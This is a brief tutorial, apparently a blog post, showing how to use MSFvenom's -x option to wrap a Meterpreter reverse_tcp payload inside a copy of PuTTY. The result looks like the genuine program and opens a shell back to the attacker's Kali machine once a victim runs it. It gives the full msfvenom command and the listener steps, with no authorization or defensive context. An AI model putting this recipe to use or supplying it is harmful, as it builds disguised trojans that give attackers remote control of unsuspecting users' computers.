Generating A Payload with MSFvenom

The -x option in MSFvenom allows us to use another program as a template to deliver a payload. This means our payload will look like the selected program. Here’s how I generated a payload with MSFvenom to look like the Windows program PuTTY, which was developed as an SSH and Telnet client.

---

Step 1: Download a Template Program

First, download putty.exe from the official site (or any other desired program – it does not have to be PuTTY).

Next, open a terminal in the Downloads folder, and run the following command to generate the payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip address> LPORT=5555 -x putty.exe -o Putty.exe

Key things to pay attention to:

• <ip address> is your Kali machine’s IP, which the payload will connect back to.
• putty.exe is the program you’re using as a template. If you’re using another program, replace this with the appropriate file name from your Downloads folder. Make sure the program file is in Downloads, since we’re running the terminal from there.

Step 2: Check the Generated Payload

If you copy the generated Putty.exe file to a Windows 10 desktop, it will look like the original putty.exe program thumbnail:

The generated payload visually matches the original putty.exe icon, but it’s actually a Meterpreter shell that will connect back to your Kali machine, providing access to the remote host.

Step 3: Set up the Listener in msfconsole

Load msfconsole and use the exploit handler to listen for an incoming connection when the payload is executed on the Windows machine. The payload type, LHOST, and LPORT must match the ones you used in MSFvenom for this to work properly.

The listener must be started before the payload is executed.

Step 4: Get the Meterpreter Session

Once Putty.exe is executed on the Windows system, a Meterpreter session is opened on your Kali machine:

Now you have an active session on the remote Windows system!